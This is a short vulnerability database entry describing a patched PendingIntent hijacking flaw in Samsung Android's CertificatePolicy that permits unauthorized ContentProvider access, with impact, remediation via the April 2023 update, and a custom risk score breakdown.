Primary

Context

Samsung PendingIntent Hijacking Vulnerability in CertificatePolicy Allowing Unauthorized Access to ContentProvider

Vulnerability

Patched

A PendingIntent hijacking vulnerability has been identified in the CertificatePolicy component of the Android framework, affecting versions prior to the April 2023 Security Maintenance Release. This vulnerability allows local attackers to access a ContentProvider without the necessary permissions. The issue arises from improper handling of PendingIntents, which can be exploited to bypass authorization requirements and access sensitive data or functionality.

Impact

Exploitation of this vulnerability could lead to unauthorized access to ContentProviders, allowing attackers to read or modify data without proper permissions.

Remediation

Users can apply the April 2023 Security Maintenance Release to address this vulnerability. Instructions for downloading this update are available on the Samsung Mobile Security Update page.

Added: Sep 3, 2025, 6:30 AM

Updated: Sep 3, 2025, 6:30 AM

Vulnerability Rating

Custom Algorithm

spread

9.0

impact

2.5

exploitability

3.3

remediation

7.7

relevance

0.5

threat

0.0

urgency

2.9

incentive

0.8

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

Vulnerability Rating

Custom Algorithm

spread

9.0

impact

2.5

exploitability

3.3

remediation

7.7

relevance

0.5

threat

0.0

urgency

2.9

incentive

0.8

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

Samsung PendingIntent Hijacking Vulnerability in CertificatePolicy Allowing Unauthorized Access to ContentProvider

Vulnerability

Impact

Remediation

Affected Products

Samsung Android

CVSS Scores

References

Vulnerability Rating

Vulnerability Rating